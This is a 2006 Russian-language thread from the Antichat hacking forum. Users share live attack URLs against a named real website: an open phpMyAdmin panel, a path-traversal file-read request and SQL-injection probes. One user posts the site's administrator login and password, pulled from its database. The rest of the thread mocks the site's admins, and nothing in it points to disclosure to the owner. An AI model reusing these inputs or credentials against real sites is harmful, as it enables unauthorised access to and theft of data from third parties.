ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Из разряда я плакал, или как это называеться?
  #1  
Старый 24.10.2006, 23:30
Аватар для Bs_Ru
Bs_Ru
Познающий
Регистрация: 10.10.2006
Сообщений: 65
Провел на форуме:
215903

Репутация: 20
Отправить сообщение для Bs_Ru с помощью ICQ
По умолчанию Из разряда я плакал, или как это называеться?

Вообщем тут такая батва, лазал я по нету и тут набрел на такое, честно впервые с таким сталктваюсь, даже незнаю как это назвать, сообстно тема или помощь начинающим хакерам ????
_http://www.rock-n-roll.ru/administration_phpmyadmin/

_http://www.rock-n-roll.ru/show.php?file=../../../../../../../../../../../usr/local/apache/htdocs/

_http://www.rock-n-roll.ru/news.php?pages=-9999999999999999999999&news=live
Ну и так далее...
 
Ответить с цитированием

  #2  
Старый 24.10.2006, 23:34
Аватар для Koller
Koller
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924

Репутация: 931
По умолчанию

INSERT INTO `administrator` VALUES (1, NULL, 'oteccs', 'oteccs', 'lol@lol.ru');

Логин и пароль - oteccs
По правде говоря тоже впервые с этим сталкиваюсь...
 
Ответить с цитированием

  #3  
Старый 24.10.2006, 23:36
Аватар для _-[A.M.D]HiM@S-_
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме:
5559831

Репутация: 1833
По умолчанию

Цитата:
_http://www.rock-n-roll.ru/administration_phpmyadmin/
База данных

Цитата:
_http://www.rock-n-roll.ru/show.php?file=../../../../../../../../../../../usr/local/apache/htdocs/
Просмотр файлов

Цитата:
_http://www.rock-n-roll.ru/news.php?pages=-9999999999999999999999&news=live
Больше похоже на SQL-inj

нолутчше так

Цитата:
http://www.rock-n-roll.ru/news.php?pages=-9999999999999999999999'

Если что-то неправильно написал - извените .
 
Ответить с цитированием

  #4  
Старый 24.10.2006, 23:38
Аватар для Bs_Ru
Bs_Ru
Познающий
Регистрация: 10.10.2006
Сообщений: 65
Провел на форуме:
215903

Репутация: 20
Отправить сообщение для Bs_Ru с помощью ICQ
По умолчанию

Это все понятно, но кто там админы?????? Обезьяны??
 
Ответить с цитированием

  #5  
Старый 24.10.2006, 23:42
Аватар для Koller
Koller
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924

Репутация: 931
По умолчанию

Да это мы поняли )...
Не в этом дело...дело в том, что почему открытый, свободных вход в phpmyadmin?
Вот этому мы тут сидим и удивляемся )
 
Ответить с цитированием

  #6  
Старый 24.10.2006, 23:45
Аватар для _-[A.M.D]HiM@S-_
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме:
5559831

Репутация: 1833
По умолчанию

Цитата:
Сообщение от Koller  
почему открытый, свободных вход в phpmyadmin?
Умные админы прописали в файле config логин рут и пароль рутоввский и положили,думали для своих нужд но умный Bs_Ru нашол эту папку и зашол в ихнею Базу дАнных что тут непонятного.
 
Ответить с цитированием

  #7  
Старый 24.10.2006, 23:49
Аватар для Koller
Koller
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924

Репутация: 931
По умолчанию

Если мне память не изменяет, что при заходе в саму программу phpmyadmin требуется ввод логина и пароля, тут ничего такого нет...заходи кто хочешь получается...
Конечно, можно предположить, что админы создали эту папку с учетом того, что никто не найдет, но ведь это просто-напросто глупо...имхо...
 
Ответить с цитированием

  #8  
Старый 24.10.2006, 23:50
Аватар для Bs_Ru
Bs_Ru
Познающий
Регистрация: 10.10.2006
Сообщений: 65
Провел на форуме:
215903

Репутация: 20
Отправить сообщение для Bs_Ru с помощью ICQ
По умолчанию

Цитата:
Не в этом дело...дело в том, что почему открытый, свободных вход в phpmyadmin?
По первости меня это и удивляло ))))
 
Ответить с цитированием

  #9  
Старый 25.10.2006, 00:13
Аватар для _-[A.M.D]HiM@S-_
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме:
5559831

Репутация: 1833
По умолчанию

Цитата:
Сообщение от Koller  
Если мне память не изменяет, что при заходе в саму программу phpmyadmin требуется ввод логина и пароля, тут ничего такого нет...заходи кто хочешь получается...
Конечно, можно предположить, что админы создали эту папку с учетом того, что никто не найдет, но ведь это просто-напросто глупо...имхо...
Много есть сайты где админы делают глупости с phpmyadmin
Пора-бы знать Ж)
 
Ответить с цитированием

  #10  
Старый 25.10.2006, 02:43
Аватар для Bs_Ru
Bs_Ru
Познающий
Регистрация: 10.10.2006
Сообщений: 65
Провел на форуме:
215903

Репутация: 20
Отправить сообщение для Bs_Ru с помощью ICQ
По умолчанию

Да уж но стока дырявых скриптов я не видел негде, это нонсенсн, как будто спецом это делали я в шоке, потому скока народа сайт просмотрели ему гг ))))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Firewall: принцип работы D=P=CH= MOD= Защита ОС: вирусы, антивирусы, файрволы. 0 02.10.2006 22:36
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Общие сведения о Ftp уязвимостях. ReVOLVeR Чужие Статьи 0 15.09.2006 19:27



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ